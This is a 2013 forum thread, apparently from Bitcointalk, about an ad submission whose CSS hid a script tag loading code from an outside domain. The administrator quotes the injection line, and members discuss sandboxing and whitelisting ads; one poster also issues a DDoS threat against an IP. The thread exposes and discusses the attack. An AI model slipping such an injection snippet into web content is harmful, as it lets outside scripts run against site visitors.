|
Title: narayan - attempted code injection Post by: theymos on August 16, 2013, 06:15:49 AM Here's an ad that was sent to me:
Sent to the address! Here is my CSS code: Code: .minefieldadm {width:620px;height:40px;overflow:hidden;font-family:Verdana;font-size:14px;border:1px solid #000;display:inline-block;background: #a3d802; background: -moz-linear-gradient(top, #a3d802 0%, #11a301 3%, #8ac916 6%, #f0b7a1 34%, #8c3310 50%, #752201 93%, #bf6e4e 98%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#a3d802), color-stop(3%,#11a301), color-stop(6%,#8ac916), color-stop(34%,#f0b7a1), color-stop(50%,#8c3310), color-stop(93%,#752201), color-stop(98%,#bf6e4e)); background: -webkit-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%); background: -o-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);background: -ms-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%); background: linear-gradient(to bottom, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a3d802', endColorstr='#bf6e4e',GradientType=0 );}Here is my HTML code: Code: <a href="http://minefield.bitcoinlab.org/?r=1XCa3af6FfBF9FZT"><div class="minefieldadm"><div class="minefieldstar1"></div> Please let me know when the ad is up. I'll be happy to give you stats on how many people clicked and how much BTC I made from this referral link. Can you spot the problem? The CSS contains code injection: Code: </style><script src='http://webkit-linear.in'></script><style> This URL contains nothing now. I guess he would have put something there if the ad had been accepted. I carefully check all ads by hand, though, so this kind of attack is pointless. Title: Re: narayan - attempted code injection Post by: narayan on August 16, 2013, 06:31:44 AM Off to my next account ;)
Title: Re: narayan - attempted code injection Post by: Raize on August 16, 2013, 06:31:52 AM Quite embarrassing.
Good catch. Title: Re: narayan - attempted code injection Post by: TiagoTiago on August 16, 2013, 06:32:53 AM Accepting ads that are anything more than a picture, alt text and a URL doesn't seem all that safe; specially considering how tempting of a target users of the forum are...
Title: Re: narayan - attempted code injection Post by: favdesu on August 16, 2013, 06:40:03 AM Off to my next account ;) just out of curiosity, do you break even as a semi-professional scammer with little to no success? Title: Re: narayan - attempted code injection Post by: theymos on August 16, 2013, 06:46:59 AM He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now.
Accepting ads that are anything more than a picture, alt text and a URL doesn't seem all that safe; specially considering how tempting of a target users of the forum are... They're safe when someone is manually reviewing them. It actually wouldn't be all that difficult to automatically verify that ads are OK: CSS can never be a security risk, and a small whitelist of known-safe HTML tags and attributes would prevent other attacks. I may add automatic verification if I ever automate the ad system, though some sort of manual approval will always be required because the ad content and size also need to be checked. (Automatically checking an ad's actual screen size seems difficult.) HTML/CSS ads are much smaller byte-wise; they can be seen by text browsers, search engines, and the visually-impaired; people can deal with them more naturally (copy/paste, etc.); they can do things that images can't do; and ad blockers can't block them as easily. They are clearly superior to image ads in almost every way. Title: Re: narayan - attempted code injection Post by: narayan on August 16, 2013, 06:59:41 AM Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon ;)
Title: Re: narayan - attempted code injection Post by: Kluge on August 16, 2013, 07:02:36 AM Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon ;) Jesus, that guy plays a lot of dice.ETA @ deleted post: lol, yeah - I bet you just RELAYED them. :D Title: Re: narayan - attempted code injection Post by: gmaxwell on August 16, 2013, 07:08:30 AM I'd suggest that you also implement some protections just in case something clever get past your eyes.
beyond some programmatic 'xss' matching, one idea would be to iframe the html/css ads on another domain, so even if they do go rogue the browser sandboxing will rescue you. I'd also be a little careful with assumptions like "CSS can never be a security risk", CSS is now a huge amount of code, it's a big attack surface, and I wouldn't be surprised if there were some zero-day CSS remote execution exploits (though... getting through manual inspection would be tough). Conversely CSS loading images and other assets from remote hosts could be used to trigger exploits in the image handlers, or just act as webbugs. Title: Re: narayan - attempted code injection Post by: Anduck on August 16, 2013, 07:22:26 AM Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon ;) Whoa, they always return with this same "you busted me, now I will ddos you!!!". Do some legit stuff.. Pays better :) Title: Re: narayan - attempted code injection Post by: BadBear on August 16, 2013, 08:52:33 AM Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon ;) Somebody sounds mad. Title: Re: narayan - attempted code injection Post by: K1773R on August 16, 2013, 02:10:28 PM mad skiddys :)
Title: Re: narayan - attempted code injection Post by: HeroC on August 16, 2013, 02:41:13 PM I wonder what he would have put there...
Title: Re: narayan - attempted code injection Post by: Raize on August 16, 2013, 03:26:07 PM I'd also be a little careful with assumptions like "CSS can never be a security risk", CSS is now a huge amount of code, it's a big attack surface, and I wouldn't be surprised if there were some zero-day CSS remote execution exploits (though... getting through manual inspection would be tough). Conversely CSS loading images and other assets from remote hosts could be used to trigger exploits in the image handlers, or just act as webbugs. On this topic, I remember a while back there was an image loading exploit that IE had a few years back, but it was wholly unreliable as an exploit till someone figured out they could use CSS to heap-spray just prior to the image load, thus making it work every time. I forget all the details, but yeah, CSS (or at least the way IE handles it) is far from perfectly safe. That said, they really only should be able to load things under the user's credentials, but on a Windows box that's typically "good enough" to do some damage. Title: Re: narayan - attempted code injection Post by: theymos on August 16, 2013, 04:48:19 PM LOL, thanks!
Title: Re: narayan - attempted code injection Post by: willphase on August 16, 2013, 05:51:50 PM To protect against this, I think it's certainly worth putting ads in iframes on a different origin - e.g. bitcointalkusercontent.org
Will Title: Re: narayan - attempted code injection Post by: phelix on August 16, 2013, 06:52:42 PM He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now. Are you saying you actually put up a link to that scammers website?Title: Re: narayan - attempted code injection Post by: tysat on August 16, 2013, 06:57:08 PM He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now. Are you saying you actually put up a link to that scammers website?Confirmed that the ad is actually placed in rotation, I just saw it. @theymos Someone tries to run a CSS injection ad and you put up his ad because "he paid"? That's an awful line of though. Title: Re: narayan - attempted code injection Post by: MiningBuddy on August 16, 2013, 07:00:44 PM He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now. Are you saying you actually put up a link to that scammers website?Confirmed that the ad is actually placed in rotation, I just saw it. @theymos Someone tries to run a CSS injection ad and you put up his ad because "he paid"? That's an awful line of though. Title: Re: narayan - attempted code injection Post by: tysat on August 16, 2013, 07:08:49 PM He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now. Are you saying you actually put up a link to that scammers website?Confirmed that the ad is actually placed in rotation, I just saw it. @theymos Someone tries to run a CSS injection ad and you put up his ad because "he paid"? That's an awful line of though. I know that, but if they're trying to get something in the ad doesn't it stand to reason that they don't deserve to have an ad in rotation? I'd say trying to get malicious code into an ad should result in a ban from the forum. Title: Re: narayan - attempted code injection Post by: Kouye on August 16, 2013, 07:21:55 PM I know that, but if they're trying to get something in the ad doesn't it stand to reason that they don't deserve to have an ad in rotation? I'd say trying to get malicious code into an ad should result in a ban from the forum. No reason to ban narayan. He has hardly trolled enough. No reason to ban team scotaloo either, better to "LOL, thank" them for offering a domain. Seriously, theymos, you understand that the sole purpose of this add was to scam people? Now that you took care of the malicious part, they don't give a single fuck about the add being showed, it's use-less to them. Showing this add, even if you just meant to be honest, which I'm convinced of, WILL encourage people thinking you're shielding scammers. Title: Re: narayan - attempted code injection Post by: jackjack on August 16, 2013, 08:08:48 PM Technically there's no proof the guy wanted to scam people...
Title: Re: narayan - attempted code injection Post by: air1 on August 16, 2013, 08:36:46 PM I know that, but if they're trying to get something in the ad doesn't it stand to reason that they don't deserve to have an ad in rotation? I'd say trying to get malicious code into an ad should result in a ban from the forum. Actually there was nothing malicious in the code. All he did was add a line code that said "run the javascript on the website blahblah.in". There was no malicious code on that website yet it was blank, he was going to add the malicious code later. Title: Re: narayan - attempted code injection Post by: Birdy on August 16, 2013, 08:38:05 PM They paid for the ad, theymos can either show the ad or refund them, he can't just take the money. Sure they attempted to scam, but that doesn't mean you can scam them back, if they had actually defrauded somebody then maybe there would be a case where theymos would refund that person, but they haven't actually managed to scam yet, with that account anyways. Attempted theft is also a crime. I think trying to inject whatever code to an advertisement is enough reason to assume they wanted to scam. No need to display the ad or refund imo. Displaying the ad also has a high risk that they might set up new malicious code on that site, they have proven that they want to do that. You may argue there was no malicious code there, but what other reason exists to try this code injection? Title: Re: narayan - attempted code injection Post by: air1 on August 16, 2013, 08:49:01 PM You may argue there was no malicious code there, but what other reason exists to try this code injection? He could have wanted to add Google Analytics tracking to the ad or similar. Attempted theft is also a crime. I think trying to inject whatever code to an advertisement is enough reason to assume they wanted to scam. No need to display the ad or refund imo. Your friend walks into a shop with a loaded gun and fails to rob it. Turns out you owe this person money, now you feel that you no longer have an obligation to pay them? Displaying the ad also has a high risk that they might set up new malicious code on that site, they have proven that they want to do that. You may argue there was no malicious code there, but what other reason exists to try this code injection? That site is not his, it's owned by another member here, he was using a referral link. And what malicious code exactly could he add? last time the code was embedded onto bitcointalk.org which means he could've altered text on the website or steal peoples passwords, but this time its not, so there isn't much he can do. Title: Re: narayan - attempted code injection Post by: freethink2013 on August 16, 2013, 08:58:06 PM I'm surprised there's no rule re malicious code in ads etc i.e. any malicious or suspicious code in your ad could mean you lose both your ad and your money...or whatever. Any attempts to subvert the proper function of this site blah blah spyware blah blah etc
Title: Re: narayan - attempted code injection Post by: tysat on August 16, 2013, 09:14:40 PM I know that, but if they're trying to get something in the ad doesn't it stand to reason that they don't deserve to have an ad in rotation? I'd say trying to get malicious code into an ad should result in a ban from the forum. Actually there was nothing malicious in the code. All he did was add a line code that said "run the javascript on the website blahblah.in". There was no malicious code on that website yet it was blank, he was going to add the malicious code later. True, but it's still a sketchy thing to do. Title: Re: narayan - attempted code injection Post by: Birdy on August 16, 2013, 09:33:53 PM Your friend walks into a shop with a loaded gun and fails to rob it. That isn't an accurate scenario.Turns out you owe this person money, now you feel that you no longer have an obligation to pay them? We are not talking about a friend in any way and it isn't independant from the tried theft. Someone paid you to borrow your car for two days. The first day he tried to rob someone with your car, do you feel obligated to lend him the car for another day? Title: Re: narayan - attempted code injection Post by: Kouye on August 16, 2013, 09:51:50 PM Sure they attempted to scam, but that doesn't mean you can scam them back Since you seem to be a little more sensitive than most scammers around, I'll just disagree with that (*), before asking you to leave us alone and target some real ennemies. People here are mostly gentle, caring, crazy, passionate, and sometimes a bit naive. They do not deserve being taken advantage of. So please fuck off. (*)I enjoyed every bit of 419eater work, for example. Title: Re: narayan - attempted code injection Post by: air1 on August 16, 2013, 11:12:57 PM Your friend walks into a shop with a loaded gun and fails to rob it. That isn't an accurate scenario.Turns out you owe this person money, now you feel that you no longer have an obligation to pay them? We are not talking about a friend in any way and it isn't independant from the tried theft. Someone paid you to borrow your car for two days. The first day he tried to rob someone with your car, do you feel obligated to lend him the car for another day? Of course not, I was never obligated to lend him the car at all. I'd have to refund him for the second day though otherwise he could sue me for the money. Title: Re: narayan - attempted code injection Post by: gmaxwell on August 17, 2013, 02:37:50 AM And what malicious code exactly could he add? last time the code was embedded onto bitcointalk.org which means he could've altered text on the website or steal peoples passwords, but this time its not, so there isn't much he can do. He tried adding a script tag to bitcointalk. He could have altered text or stolen passwords. It was like he walked into a shop with a gun hidden in a bag, he pulled the trigger and Theymos did a Neo-in-the-matrix like dodge and no one was hit. Maybe the bullets really were blank? We don't know because there wasn't a hit. After Theymos bragged about his deft dodge the guy comes back and appears to be yabbering on about DOS attacking the proxy Theymos used to check the script. But if you want to keep saying "Actually there was nothing malicious"... please remind me of this if it ever looks like I'm trusting your judgement for anything. Title: Re: narayan - attempted code injection Post by: Justin00 on August 17, 2013, 03:08:21 AM serious question... If I stole BTC from someone.. and used the BTC to buy an ad, would you put the ad up ?
I didnt/don't intend to steal BTC. just curious about the answer.. Title: Re: narayan - attempted code injection Post by: gmaxwell on August 17, 2013, 03:57:33 AM serious question... If I stole BTC from someone.. and used the BTC to buy an ad, would you put the ad up ? I think you're not providing enough information. If I claim all your BTC was stolen from me, should Theymos never put up an ad for you?I didnt/don't intend to steal BTC. just curious about the answer.. Did you intend to ask "If someone comes to you and says, in all seriousness, 'I want to put up an ad with this big pile of totally stolen btc' would you put the ad up?" Title: Re: narayan - attempted code injection Post by: John (John K.) on August 18, 2013, 01:32:25 PM PS: Guys, I think narayan's already banned.
Title: Re: narayan - attempted code injection Post by: RodeoX on August 21, 2013, 07:52:08 PM I'm sort of a bastard, but I would ban him, keep the money, and replace his add in rotation with a warning about his "business".
Title: Re: narayan - attempted code injection Post by: phelix on August 23, 2013, 07:24:19 AM I'm sort of a bastard, but I would ban him, keep the money, and replace his add in rotation with a warning about his "business". Since he even admitted his wrongdoing that's the only way to go.Theymos, you are too liberal. ;D |